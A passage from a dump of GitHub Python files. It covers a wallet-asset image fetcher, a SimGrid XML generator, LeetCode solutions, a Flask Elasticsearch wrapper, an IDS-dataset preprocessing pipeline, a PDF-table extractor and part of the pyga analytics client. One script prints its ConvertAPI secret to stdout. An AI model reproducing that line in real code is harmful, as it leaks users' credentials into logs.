open('dataset/positive_words_not_stemmed.txt', 'w', encoding='utf-8')\r\ncount = 1\r\nfor x,y in words.items():\r\n print(count)\r\n count += 1\r\n f.write(x + ' ' + str(y) + '\\n')\r\nf.close()","repo_name":"msaidzengin/turkish-sentiment-analysis","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"32253489656","text":"import requests\nimport json\nimport convertapi\nimport os\nimport argparse\n\nconvertapi.api_secret = os.environ.get('CONVERTAPI_API_SECRET')\nprint(f'Convert API Secret: {convertapi.api_secret}')\n\ndef get_wallet_assets(address):\n print(f'Fetching Wallet Assets for {address} - step 0')\n url = f'https://xchain.io/api/balances/{address}'\n response = requests.get(url)\n if response.status_code == 200:\n balance_info = response.json()\n all_wallet_assets = []\n print(f'Fetching Wallet Assets for {address}')\n\n for balance in balance_info['data']:\n asset = {\n 'asset': balance['asset'],\n 'quantity': balance['quantity'],\n 'asset_longname': balance['asset_longname'],\n 'description': balance['description'],\n }\n all_wallet_assets.append(asset)\n return all_wallet_assets\n else:\n print(f'Error: {response.status_code} - {response.reason}')\n\ndef get_asset_owner(asset): \n url = f'https://xchain.io/api/asset/{asset}'\n response = requests.get(url)\n asset_description = {}\n\n if response.status_code == 200:\n asset_info = response.json()\n asset_description = {\n 'asset': asset_info[\"asset\"],\n 'description': asset_info[\"description\"],\n 'owner': asset_info[\"owner\"]\n }\n return(asset_description)\n else:\n print(f'Error: {response.status_code} - {response.reason}') \n\ndef get_description_urls(check_address):\n # This fetches the description JSON and parses out the image_url field\n all_wallet_assets = get_wallet_assets(check_address)\n output = []\n print(f'Check if Wallet Owner is Owner of Asset')\n for asset_name in all_wallet_assets:\n asset = asset_name['asset']\n assets_owned_descriptions = get_asset_owner(asset)\n\n if assets_owned_descriptions['owner'] == check_address:\n if assets_owned_descriptions['description'].lower().endswith('.json'):\n description_url = assets_owned_descriptions['description']\n response = requests.get(description_url)\n if response.status_code == 200:\n description_info = response.json()\n image_url = description_info['image_large']\n asset_desc_img_url = {\n \"asset\": asset,\n \"description_url\": description_url,\n \"image_url\": image_url\n }\n output.append(asset_desc_img_url)\n print(json.dumps(asset_desc_img_url))\n # print('\\n')\n else:\n print(f'Error: {response.status_code} - {response.reason}')\n # Save the output to a JSON file\n with open('asset_desc_img_url.json', 'w') as outfile:\n json.dump(asset_desc_img_url, outfile)\n return output\n\ndef save_images(asset_desc_img_urls):\n if not os.path.exists('images'):\n os.mkdir('images')\n for asset_desc_img_url in asset_desc_img_urls:\n # separate the asset value and image_url value\n asset = asset_desc_img_url['asset']\n image_url = asset_desc_img_url['image_url']\n image_filename = image_url.rsplit('/', 1)[1]\n full_filename = asset + '-' + image_filename\n with open('images/' + full_filename, 'wb') as f:\n f.write(requests.get(image_url).content)\n files = os.listdir('images')\n\n for file in files:\n # get the full filename\n print(f'Processing: {file}')\n full_filename = os.path.join('images', file)\n\n # get the file extension from the filename\n file_extension = file.rsplit('.', 1)[1]\n\n # convert the file to webp\n convertapi.convert('webp', {'File': full_filename}, from_format=file_extension).save_files('images')\n\ndef main():\n # Define parser and add arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-w', '--wallet', help='The wallet address to check')\n\n # Parse arguments\n args = parser.parse_args()\n\n # Assign arguments to variables\n check_address = args.wallet\n\n # check_address = '1AwS3wRFNCoymKs69BXjAA4VfgWvuKvx4j'\n print(f'Checking address: {check_address} for assets')\n asset_desc_img_urls = get_description_urls(check_address)\n print(f'Preparing for image download and conversion')\n # print(json.dumps(asset_desc_img_urls, indent=4))\n save_images(asset_desc_img_urls)\n\nif __name__ == '__main__':\n main()","repo_name":"hydren-crypto/xcp","sub_path":"xcp_functions.py","file_name":"xcp_functions.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"25475647245","text":"import csv, sys, os, datetime\nimport xml.etree.ElementTree as xml\nimport xml.dom.minidom as xmldom\n\ndef main():\n if len(sys.argv) != 3:\n print(\"python3 \" + str(sys.argv[0]) + \" \") \n exit(0)\n\n width = int(sys.argv[1])\n depth = int(sys.argv[2])\n\n platform = xml.Element(\"platform\")\n platform.set('version', '4.1')\n\n AS = xml.SubElement(platform, 'AS')\n AS.set('id', 'AS0')\n AS.set('routing', 'Full')\n\n for i in range(depth):\n if i == depth - 1:\n rad = \"0-1\"\n else:\n rad = \"0-\" + str(width - 1)\n\n ida = \"Coupled-\" + str(i)\n prefix = \"cp-\" + str(i) + \"-\"\n\n coupled = xml.SubElement(AS, 'cluster')\n coupled.set('id', ida)\n coupled.set('prefix', prefix)\n coupled.set('suffix', \"\")\n coupled.set('radical', rad)\n coupled.set('speed', '1e9f')\n coupled.set('bw', '1Gbps')\n coupled.set('lat', '0')\n coupled.set('router_id','RCoupled' + str(i))\n\n gen = xml.SubElement(AS, 'cluster')\n gen.set('id', 'Generator0')\n gen.set('prefix', 'gen-')\n gen.set('suffix', '')\n gen.set('radical', '0-1')\n gen.set('speed', '1e9f')\n gen.set('bw', '1Gbps')\n gen.set('lat', '0')\n gen.set('router_id','RGenerator0')\n\n fin = xml.SubElement(AS, 'cluster')\n fin.set('id', 'Finisher0')\n fin.set('prefix', 'fin-')\n fin.set('suffix', '')\n fin.set('radical', '0-1')\n fin.set('speed', '1e9f')\n fin.set('bw', '1Gbps')\n fin.set('lat', '0')\n fin.set('router_id','RFinisher0')\n\n link = xml.SubElement(AS, 'link')\n link.set('id', 'linkGen0Coupled0')\n link.set('latency', '0')\n link.set('bandwidth', '1Gbps')\n\n for i in range(depth):\n link = xml.SubElement(AS, 'link')\n idl = \"linkCoupled\" + str(i) + \"Fin0\"\n link.set('id', idl)\n link.set('latency', '0')\n link.set('bandwidth', '1Gbps')\n\n for i in range(depth - 1):\n link = xml.SubElement(AS, 'link')\n idl = \"linkCoupled\" + str(i) + \"Coupled\" + str(i+1)\n link.set('id', idl)\n link.set('latency', '0')\n link.set('bandwidth', '1Gbps')\n \n ASroute = xml.SubElement(AS, 'ASroute')\n ASroute.set('src', 'Generator0')\n ASroute.set('dst', 'Coupled-0')\n ASroute.set('gw_src', 'RGenerator0')\n ASroute.set('gw_dst', \"RCoupled0\")\n\n link_ctn = xml.SubElement(ASroute, 'link_ctn')\n link_ctn.set('id', \"linkGen0Coupled0\")\n\n for i in range(depth):\n ASroute = xml.SubElement(AS, 'ASroute')\n ASroute.set('src', \"Coupled-\" + str(i))\n ASroute.set('dst', 'Finisher0')\n ASroute.set('gw_src', \"RCoupled\" + str(i))\n ASroute.set('gw_dst', 'RFinisher0')\n\n link_ctn = xml.SubElement(ASroute, 'link_ctn')\n link_ctn.set('id', \"linkCoupled\" + str(i) + \"Fin0\")\n\n for i in range(depth - 1):\n ASroute = xml.SubElement(AS, 'ASroute')\n ASroute.set('src', \"Coupled-\" + str(i))\n ASroute.set('dst', \"Coupled-\" + str(i+1))\n ASroute.set('gw_src', \"RCoupled\" + str(i))\n ASroute.set('gw_dst', \"RCoupled\" + str(i+1))\n\n link_ctn = xml.SubElement(ASroute, 'link_ctn')\n link_ctn.set('id', \"linkCoupled\" + str(i) + \"Coupled\" + str(i+1))\n\n tree = xml.ElementTree(platform)\n\n with open(\"platform.xml\", \"wb\") as fh:\n fh.write(\"\".encode(\n 'utf-8'))\n\n with open(\"platform.xml\", \"ab\") as fh:\n tree.write(fh, encoding='utf-8')\n\n dom = xmldom.parse(\"platform.xml\")\n string = dom.toprettyxml()\n\n f = open(\"platform.xml\", \"w\")\n string = string.replace('','')\n f.write(string)\n f.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"edelpozop/SimGrid-DEVS","sub_path":"HO/Previous Versions/v2/xml_cre2.py","file_name":"xml_cre2.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"23375537343","text":"from typing import *\n\n\n# 315. 计算右侧小于当前元素的个数\n# 8000ms\nclass Solution:\n def countSmaller(self, nums: List[int]) -> List[int]:\n log = []\n out = []\n\n for i in range(len(nums) - 1, -1, -1):\n left = 0\n right = len(log) - 1\n\n while left <= right:\n mid = (left + right) // 2\n\n if nums[i] <= log[mid]:\n left = mid + 1\n else:\n right = mid - 1\n out.insert(0, len(log) - left)\n log.insert(left, nums[i])\n\n return out\n\n# 315. 计算右侧小于当前元素的个数\n# 1700ms\ndef lowbit(x):\n return x&(-x)\n\nclass Solution:\n def countSmaller(self, nums: List[int]) -> List[int]:\n move=10**4+1\n out=[]\n self.mem=[0]*(2*move)\n self.n=2*move-1\n for i in range(len(nums)-1,-1,-1):\n out.append(self.query(nums[i]+move-1))\n self.add(nums[i]+move)\n return out[::-1]\n\n def add(self,x):\n while x<=self.n:\n self.mem[x]+=1\n x+=lowbit(x)\n\n def query(self,x):\n out=0\n while x>0:\n out+=self.mem[x]\n x-=lowbit(x)\n return out\n\nnums = [5, 2, 6, 1]\nnums = [1,1,1, 1]\nsl = Solution()\nprint(sl.countSmaller(nums))\n","repo_name":"zzz136454872/leetcode","sub_path":"countSmaller.py","file_name":"countSmaller.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"16885939296","text":"import os\n\nfrom flask import current_app\n\nfrom elasticutils import S\n\n\nclass ElasticUtils(object):\n \"\"\"\n A thin wrapper around elasticutils\n \"\"\"\n def __init__(self, app=None):\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n app.config.setdefault('ELASTICSEARCH_URL',\n os.environ.get('ELASTICSEARCH_URL', 'localhost:9200'))\n\n if not hasattr(app, 'extensions'):\n app.extensions = {}\n\n app.extensions['elasticutils'] = S().es(urls=[app.config['ELASTICSEARCH_URL']])\n\n def __getattr__(self, item):\n if not 'elasticutils' in current_app.extensions.keys():\n raise Exception('not initialised, did you forget to call init_app?')\n return getattr(current_app.extensions['elasticutils'], item)\n","repo_name":"neilalbrock/flask-elasticutils","sub_path":"flask_elasticutils.py","file_name":"flask_elasticutils.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"14844775311","text":"from typing import List, Tuple, Optional\nimport os\nimport pandas as pd\nimport numpy as np\nimport yaml\n\nfrom scipy.io import loadmat\nfrom sklearn.pipeline import Pipeline\nfrom data.preprocessing import BinaryEncoder, CleanUnique, CleanNegative, CopyLabels, ReplaceNaN, CleanNaN\n\n\nclass BasePipeline:\n\n def __init__(self, path: str, output_path: str, output_name: str, drop_cols: List[int] = None):\n self.path = path\n self.drop_cols = drop_cols or []\n self.output_path = output_path\n self.output_name = output_name if output_name.endswith(\".npz\") else output_name + \".npz\"\n\n def load_data(self) -> Tuple[pd.DataFrame, pd.DataFrame]:\n pass\n\n def setup_pipeline(self) -> Pipeline:\n pass\n\n def preprocess_labels(self, y: pd.DataFrame, dropped_indexes: List[int]) -> Tuple[np.ndarray, Optional[np.ndarray]]:\n y = y.drop(dropped_indexes, axis=0)\n return y.astype(np.int8).to_numpy(), None\n\n def process(self):\n summary = {}\n # Load data and labels\n df, y = self.load_data()\n summary[\"initial_n_instances\"] = df.shape[0]\n summary[\"initial_in_features\"] = df.shape[1]\n # Apply preprocessing on data\n data_pipeline = self.setup_pipeline()\n df = data_pipeline.fit_transform(df, y)\n # Fetch dropped indexes and steps summaries for the report\n dropped_indexes = set()\n for step_name, step in data_pipeline.steps:\n if hasattr(step, \"summary\"):\n summary[step_name] = step.summary\n if hasattr(step, \"dropped_rows\"):\n dropped_indexes = dropped_indexes | set(step.dropped_rows)\n summary[\"final_n_instances\"] = df.shape[0]\n summary[\"final_in_features\"] = df.shape[1]\n # Save changes summary in file\n info_fname = os.path.join(self.output_path, self.output_name.split(\".\")[0] + \"_info.yaml\")\n with open(info_fname, \"w\") as f:\n f.write(\n yaml.dump(summary, default_flow_style=False)\n )\n y, labels = self.preprocess_labels(y, dropped_indexes)\n\n # Save data\n np.savez(\n os.path.join(self.output_path, self.output_name),\n X=df.to_numpy(),\n y=y,\n labels=labels if labels is not None else []\n )\n # df.to_csv(\n # os.path.join(self.output_path, self.output_name)\n # )\n\n\nclass IDSPipeline(BasePipeline):\n\n def uniformize_labels(self, df: pd.DataFrame) -> pd.DataFrame:\n # Group DoS attacks\n mask = df[\"Label\"].str.startswith(\"DoS\")\n df.loc[mask, \"Label\"] = \"DoS\"\n # Group Web attacks\n mask = df[\"Label\"].str.startswith(\"Web Attack\")\n df.loc[mask, \"Label\"] = \"Web Attack\"\n # Rename attacks to match the labels of IDS2018\n # Rename BENIGN to Benign\n mask = df[\"Label\"].str.match(\"BENIGN\")\n df.loc[mask, \"Label\"] = \"Benign\"\n # Rename FTP-Patator to FTP-BruteForce\n mask = df[\"Label\"].str.match(\"FTP-Patator\")\n df.loc[mask, \"Label\"] = \"FTP-BruteForce\"\n # Rename SSH-Patator to SSH-Bruteforce\n mask = df[\"Label\"].str.match(\"SSH-Patator\")\n df.loc[mask, \"Label\"] = \"SSH-Bruteforce\"\n return df\n\n def setup_pipeline(self) -> Pipeline:\n data_pipeline = Pipeline(\n steps=[\n (\"Clean Unique\", CleanUnique()),\n (\"NaN Imputer\", ReplaceNaN(missing_values=np.nan, fill_value=0)),\n (\"Negative Imputer\", CleanNegative(atol=0.01, normal_label=\"Benign\")),\n (\"Copy Labels\", CopyLabels(to_col=\"Category\")),\n ]\n )\n return data_pipeline\n\n def preprocess_labels(self, y: pd.DataFrame, dropped_indexes: List[int]) -> Tuple[np.ndarray, np.ndarray]:\n # Remove dropped indexes\n y = y.drop(list(dropped_indexes), axis=0)\n # Copy labels\n labels = y.copy()\n # Encode binary labels\n enc = BinaryEncoder(normal_label=\"Benign\")\n y = enc.fit_transform(y)\n return y.astype(np.int8).to_numpy(), labels.to_numpy()\n\n def load_data(self):\n df = pd.DataFrame()\n if os.path.isdir(self.path):\n for f in os.listdir(self.path):\n if f.endswith(\".csv\"):\n path_to_csv = os.path.join(self.path, f)\n print(f\"processing {path_to_csv} ...\")\n chunk = pd.read_csv(path_to_csv)\n chunk.columns = chunk.columns.str.strip()\n chunk = chunk.drop(self.drop_cols, axis=1, errors=\"ignore\")\n df = pd.concat((df, chunk))\n else:\n print(f\"skipping file {f}\")\n df.to_csv(\n os.path.join(self.output_path, \"merged.csv\"), index=False\n )\n else:\n df = pd.read_csv(self.path)\n df = df.drop(self.drop_cols, axis=1, errors=\"ignore\")\n df = self.uniformize_labels(df)\n return df.drop(\"Label\", axis=1), df.loc[:, \"Label\"]\n\n\nclass MATPipeline(BasePipeline):\n\n def load_data(self):\n mat = loadmat(self.path)\n X = mat['X'] # variable in mat file\n y = mat['y']\n # now make a data frame, setting the time stamps as the index\n return pd.DataFrame(X), pd.DataFrame(y)\n \n def setup_pipeline(self) -> Pipeline:\n pipeline = Pipeline(\n steps=[\n (\"Clean Unique\", CleanUnique()),\n (\"Clean NaN\", CleanNaN(atol=0.01, normal_label=0)),\n (\"Clean Negative\", CleanNegative(atol=0.01, normal_label=0)),\n ],\n )\n return pipeline\n","repo_name":"crakreydiak/pyad","sub_path":"data/preprocessing/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"236399498","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# comment_magics: true\n# split_at_heading: true\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.9.1\n# kernelspec:\n# display_name: Python 3.8.2 64-bit\n# metadata:\n# interpreter:\n# hash: 20bf69066c0dd38d51965b69d5e1b6e387082e3198ba56e97997ac55f4e50ad0\n# name: python3\n# ---\n\nimport pandas as pd\nimport tabula\nimport zipfile\nimport io\nimport math\n\npd.options.display.max_colwidth = 1000\npd.options.display.max_rows = None\nfilename = \"Padrao_TISS_Componente_Organizacional__202012.pdf\"\n\n# # Table 30\n\n# +\npage = 79\ntop = 132.87\nleft = 134.41\nbottom = top + 83.1\nright = left + 212.2\ncol_boundary = 201.75\n\ndf = tabula.read_pdf(filename,\n pages=page,\n guess=False,\n area=[top, left, bottom, right],\n columns=[col_boundary])[0]\ndf\n# -\n\ndf.to_csv('table-30.csv', index=False)\n\n# # Table 32\n\n# +\npage = 85\ntop = 147.08\nleft = 136.12\nbottom = top + 54.73\nright = left + 177.02\ncol_boundary = 169.6\n\ndf = tabula.read_pdf(filename,\n pages=page,\n guess=False,\n area=[top, left, bottom, right],\n columns=[col_boundary])[0]\ndf\n# -\n\ndf.to_csv('table-32.csv', index=False)\n\n# # Table 31\n\nfirst_page = 79\nlast_page = 84 + 1 # need to add 1 since end index is exclusive\npages = list(range(first_page, last_page))\ndfs = tabula.read_pdf(filename, pages=pages)[1:]\n\ndfs[0]\n\n# Fix the first dataframe (which contains the header)\ndf = dfs[0]\nheaders = df.iloc[0]\ndfs[0] = pd.DataFrame(df.values[1:], columns=headers)\ndfs[0]\n\n\n# +\n# Set the headers in the remaining dataframes\n\ndef set_headers(df, headers):\n new_df = pd.read_csv(io.StringIO(df.to_csv(index=False)), header=None)\n return pd.DataFrame(new_df.values, columns=headers)\n\nfor i in range(1, len(dfs)):\n dfs[i] = set_headers(dfs[i], headers)\n# -\n\ndf = pd.concat(dfs, ignore_index=True)\n\ndf.columns\n\ndf\n\n# +\n'''\nTabula does not deal well with entries that take up more\nthan one line in the PDF.\nWe need to scan the df in order to find these entries\nand fix them up.\n'''\n\ndef fix_entries(df):\n new_df = pd.DataFrame(columns=df.columns)\n i = 1\n while i < df.shape[0]:\n row = df.iloc[i-1].copy()\n x = df.iloc[i]['Descrição da categoria']\n if isinstance(x, float) and math.isnan(x):\n suffix = df.iloc[i]['Código']\n row['Descrição da categoria'] += ' {}'.format(suffix)\n i += 1\n new_df = new_df.append(row, ignore_index=True)\n i += 1\n \n row = df.iloc[df.shape[0]-1].copy() # copy last row\n new_df = new_df.append(row, ignore_index=True)\n return new_df\n\nnew_df = fix_entries(df)\n# -\n\nnew_df\n\n# We can now export to CSV\nnew_df.to_csv('table-31.csv', index=False)\n\n# # Zipping files\n#\n\nfiles = ['table-30.csv', 'table-31.csv', 'table-32.csv']\nzip_filename = 'Teste_Intuitive_Care_breno_fatureto.zip'\nziph = zipfile.ZipFile(zip_filename, 'w')\nfor file in files:\n ziph.write(file)\nziph.close()\n","repo_name":"brenoafb/intuitive-care","sub_path":"scripts/test2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"10570209407","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport calendar\nfrom math import floor\nfrom pyga.entities import Campaign, CustomVariable, Event, Item, Page, Session, SocialInteraction, Transaction, Visitor\nimport pyga.utils as utils\nimport urllib\nimport urllib2\n\n__author__ = \"Arun KR (kra3) \"\n__license__ = \"Simplified BSD\"\n__version__ = '2.5.0'\n\nlogger = logging.getLogger(__name__)\n\n\nclass Q(object):\n REQ_ARRAY = []\n\n def add_wrapped_request(self, req_wrapper):\n self.REQ_ARRAY.append(req_wrapper)\n\n\nclass GIFRequest(object):\n '''\n\n Properties:\n type -- Indicates the type of request, will be mapped to \"utmt\" parameter\n config -- base.Config object\n x_forwarded_for --\n user_agent -- User Agent String\n\n '''\n def __init__(self, config):\n self.type = None\n self.config = None\n self.x_forwarded_for = None\n self.user_agent = None\n self.__Q = Q()\n if isinstance(config, Config):\n self.config = config\n\n def build_http_request(self):\n params = self.build_parameters()\n query_string = urllib.urlencode(params.get_parameters())\n query_string = query_string.replace('+', '%20')\n\n # Mimic Javascript's encodeURIComponent() encoding for the query\n # string just to be sure we are 100% consistent with GA's Javascript client\n query_string = utils.convert_to_uri_component_encoding(query_string)\n\n # Recent versions of ga.js use HTTP POST requests if the query string is too long\n use_post = len(query_string) > 2036\n\n if not use_post:\n url = '%s?%s' % (self.config.endpoint, query_string)\n post = None\n else:\n url = self.config.endpoint\n post = query_string\n\n headers = {}\n headers['Host'] = self.config.endpoint.split('/')[2]\n headers['User-Agent'] = self.user_agent\n headers['X-Forwarded-For'] = self.x_forwarded_for and self.x_forwarded_for or ''\n\n if use_post:\n # Don't ask me why \"text/plain\", but ga.js says so :)\n headers['Content-Type'] = 'text/plain'\n headers['Content-Length'] = len(query_string)\n\n logger.debug(url)\n if post:\n logger.debug(post)\n return urllib2.Request(url, post, headers)\n\n def build_parameters(self):\n '''Marker implementation'''\n return Parameters()\n\n def __send(self):\n request = self.build_http_request()\n response = None\n\n # Do not actually send the request if endpoint host is set to null\n if self.config.endpoint:\n response = urllib2.urlopen(\n request, timeout=self.config.request_timeout)\n\n return response\n\n def fire(self):\n '''\n Simply delegates to send() if config option \"queue_requests\" is disabled\n else enqueues the request into Q object: you should call pyga.shutdowon\n as last statement, to actually send out all queued requests.\n '''\n if self.config.queue_requests:\n # Queuing results. You should call pyga.shutdown as last statement to send out requests.\n self.__Q.add_wrapped_request((lambda: self.__send()))\n else:\n self.__send()\n\n\nclass Request(GIFRequest):\n TYPE_PAGE = None\n TYPE_EVENT = 'event'\n TYPE_TRANSACTION = 'tran'\n TYPE_ITEM = 'item'\n TYPE_SOCIAL = 'social'\n\n '''\n This type of request is deprecated in favor of encoding custom variables\n within the \"utme\" parameter, but we include it here for completeness\n '''\n TYPE_CUSTOMVARIABLE = 'var'\n\n X10_CUSTOMVAR_NAME_PROJECT_ID = 8\n X10_CUSTOMVAR_VALUE_PROJCT_ID = 9\n X10_CUSTOMVAR_SCOPE_PROJECT_ID = 11\n\n def __init__(self, config, tracker, visitor, session):\n super(Request, self).__init__(config)\n self.tracker = tracker\n self.visitor = visitor\n self.session = session\n\n def build_http_request(self):\n self.x_forwarded_for = self.visitor.ip_address\n self.user_agent = self.visitor.user_agent\n\n # Increment session track counter for each request\n self.session.track_count = self.session.track_count + 1\n\n #http://code.google.com/intl/de-DE/apis/analytics/docs/tracking/eventTrackerGuide.html#implementationConsiderations\n if self.session.track_count > 500:\n logger.warning('Google Analytics does not guarantee to process more than 500 requests per session.')\n\n if self.tracker.campaign:\n self.tracker.campaign.response_count = self.tracker.campaign.response_count + 1\n\n return super(Request, self).build_http_request()\n\n def build_parameters(self):\n params = Parameters()\n params.utmac = self.tracker.account_id\n params.utmhn = self.tracker.domain_name\n params.utmt = self.get_type()\n params.utmn = utils.get_32bit_random_num()\n '''\n The \"utmip\" parameter is only relevant if a mobile analytics ID\n (MO-XXXXXX-X) was given\n '''\n params.utmip = self.visitor.ip_address\n params.aip = self.tracker.config.anonimize_ip_address and 1 or None\n if params.aip:\n # If anonimization of ip enabled? then!\n params.utmip = utils.anonymize_ip(params.utmip)\n\n params.utmhid = self.session.session_id\n params.utms = self.session.track_count\n params = self.build_visitor_parameters(params)\n params = self.build_custom_variable_parameters(params)\n params = self.build_campaign_parameters(params)\n params = self.build_cookie_parameters(params)\n return params\n\n def build_visitor_parameters(self, params):\n if self.visitor.locale:\n params.utmul = self.visitor.locale.replace('_', '-').lower()\n\n if self.visitor.flash_version:\n params.utmfl = self.visitor.flash_version\n\n if self.visitor.java_enabled:\n params.utje = self.visitor.java_enabled\n\n if self.visitor.screen_colour_depth:\n params.utmsc = '%s-bit' % (self.visitor.screen_colour_depth)\n\n if self.visitor.screen_resolution:\n params.utmsr = self.visitor.screen_resolution\n\n return params\n\n def build_custom_variable_parameters(self, params):\n custom_vars = self.tracker.custom_variables\n\n if custom_vars:\n if len(custom_vars) > 5:\n logger.warning('The sum of all custom variables cannot exceed 5 in any given request.')\n\n x10 = X10()\n x10.clear_key(self.X10_CUSTOMVAR_NAME_PROJECT_ID)\n x10.clear_key(self.X10_CUSTOMVAR_VALUE_PROJCT_ID)\n x10.clear_key(self.X10_CUSTOMVAR_SCOPE_PROJECT_ID)\n\n for cvar in custom_vars.itervalues():\n name = utils.encode_uri_components(cvar.name)\n value = utils.encode_uri_components(cvar.value)\n x10.set_key(\n self.X10_CUSTOMVAR_NAME_PROJECT_ID, cvar.index, name)\n x10.set_key(\n self.X10_CUSTOMVAR_VALUE_PROJCT_ID, cvar.index, value)\n\n if cvar.scope and cvar.scope != CustomVariable.SCOPE_PAGE:\n x10.set_key(self.X10_CUSTOMVAR_SCOPE_PROJECT_ID,\n cvar.index, cvar.scope)\n\n params.utme = '%s%s' % (params.utme, x10.render_url_string())\n\n return params\n\n def build_campaign_parameters(self, params):\n campaign = self.tracker.campaign\n if campaign:\n params._utmz = '%s.%s.%s.%s.' % (\n self._generate_domain_hash(),\n calendar.timegm(campaign.creation_time.timetuple()),\n self.visitor.visit_count,\n campaign.response_count,\n )\n\n param_map = {\n 'utmcid': campaign.id,\n 'utmcsr': campaign.source,\n 'utmgclid': campaign.g_click_id,\n 'utmdclid': campaign.d_click_id,\n 'utmccn': campaign.name,\n 'utmcmd': campaign.medium,\n 'utmctr': campaign.term,\n 'utmcct': campaign.content,\n }\n\n for k, v in param_map.iteritems():\n if v:\n # Only spaces and pluses get escaped in gaforflash and ga.js, so we do the same\n params._utmz = '%s%s=%s%s' % (params._utmz, k,\n v.replace('+', '%20').replace(' ', '%20'),\n Campaign.CAMPAIGN_DELIMITER\n )\n\n params._utmz = params._utmz.rstrip(Campaign.CAMPAIGN_DELIMITER)\n\n return params\n\n def build_cookie_parameters(self, params):\n domain_hash = self._generate_domain_hash()\n params._utma = \"%s.%s.%s.%s.%s.%s\" % (\n domain_hash,\n self.visitor.unique_id,\n calendar.timegm(self.visitor.first_visit_time.timetuple()),\n calendar.timegm(self.visitor.previous_visit_time.timetuple()),\n calendar.timegm(self.visitor.current_visit_time.timetuple()),\n self.visitor.visit_count\n )\n params._utmb = '%s.%s.10.%s' % (\n domain_hash,\n self.session.track_count,\n calendar.timegm(self.session.start_time.timetuple()),\n )\n params._utmc = domain_hash\n cookies = []\n cookies.append('__utma=%s;' % params._utma)\n if params._utmz:\n cookies.append('__utmz=%s;' % params._utmz)\n if params._utmv:\n cookies.append('__utmv=%s;' % params._utmv)\n\n params.utmcc = '+'.join(cookies)\n return params\n\n def _generate_domain_hash(self):\n hash_val = 1\n if self.tracker.allow_hash:\n hash_val = utils.generate_hash(self.tracker.domain_name)\n\n return hash_val\n\n\nclass ItemRequest(Request):\n def __init__(self, config, tracker, visitor, session, item):\n super(ItemRequest, self).__init__(config, tracker, visitor, session)\n self.item = item\n\n def get_type(self):\n return ItemRequest.TYPE_ITEM\n\n def build_parameters(self):\n params = super(ItemRequest, self).build_parameters()\n params.utmtid = self.item.order_id\n params.utmipc = self.item.sku\n params.utmipn = self.item.name\n params.utmiva = self.item.variation\n params.utmipr = self.item.price\n params.utmiqt = self.item.quantity\n return params\n\n def build_visitor_parameters(self, parameters):\n '''\n The GA Javascript client doesn't send any visitor information for\n e-commerce requests, so we don't either.\n '''\n return parameters\n\n def build_custom_variable_parameters(self, parameters):\n '''\n The GA Javascript client doesn't send any custom variables for\n e-commerce requests, so we don't either.\n '''\n return parameters\n\n\nclass PageViewRequest(Request):\n X10_SITESPEED_PROJECT_ID = 14\n\n def __init__(self, config, tracker, visitor, session, page):\n super(\n PageViewRequest, self).__init__(config, tracker, visitor, session)\n self.page = page\n\n def get_type(self):\n return PageViewRequest.TYPE_PAGE\n\n def build_parameters(self):\n params = super(PageViewRequest, self).build_parameters()\n params.utmp = self.page.path\n params.utmdt = self.page.title\n\n if self.page.charset:\n params.utmcs = self.page.charset\n\n if self.page.referrer:\n params.utmr = self.page.referrer\n\n if self.page.load_time:\n if params.utmn % 100 < self.config.site_speed_sample_rate:\n x10 = X10()\n x10.clear_key(self.X10_SITESPEED_PROJECT_ID)\n x10.clear_value(self.X10_SITESPEED_PROJECT_ID)\n\n # from ga.js\n key = max(min(floor(self.page.load_time / 100), 5000), 0) * 100\n x10.set_key(\n self.X10_SITESPEED_PROJECT_ID, X10.OBJECT_KEY_NUM, key)\n x10.set_value(self.X10_SITESPEED_PROJECT_ID,\n X10.VALUE_VALUE_NUM, self.page.load_time)\n params.utme = '%s%s' % (params.utme, x10.render_url_string())\n\n return params\n\n\nclass EventRequest(Request):\n X10_EVENT_PROJECT_ID = 5\n\n def __init__(self, config, tracker, visitor, session, event):\n super(EventRequest, self).__init__(config, tracker, visitor, session)\n self.event = event\n\n def get_type(self):\n return EventRequest.TYPE_EVENT\n\n def build_parameters(self):\n params = super(EventRequest, self).build_parameters()\n x10 = X10()\n x10.clear_key(self.X10_EVENT_PROJECT_ID)\n x10.clear_value(self.X10_EVENT_PROJECT_ID)\n x10.set_key(self.X10_EVENT_PROJECT_ID, X10.OBJECT_KEY_NUM,\n self.event.category)\n x10.set_key(\n self.X10_EVENT_PROJECT_ID, X10.TYPE_KEY_NUM, self.event.action)\n\n if self.event.label:\n x10.set_key(self.X10_EVENT_PROJECT_ID,\n X10.LABEL_KEY_NUM, self.event.label)\n\n if self.event.value:\n x10.set_value(self.X10_EVENT_PROJECT_ID,\n X10.VALUE_VALUE_NUM, self.event.value)\n\n params.utme = \"%s%s\" % (params.utme, x10.render_url_string())\n\n if self.event.noninteraction:\n params.utmni = 1\n\n return params\n\n\nclass SocialInteractionRequest(Request):\n def __init__(self, config, tracker, visitor, session, social_interaction, page):\n super(SocialInteractionRequest, self).__init__(config,\n tracker, visitor, session)\n self.social_interaction = social_interaction\n self.page = page\n\n def get_type(self):\n return SocialInteractionRequest.TYPE_SOCIAL\n\n def build_parameters(self):\n params = super(SocialInteractionRequest, 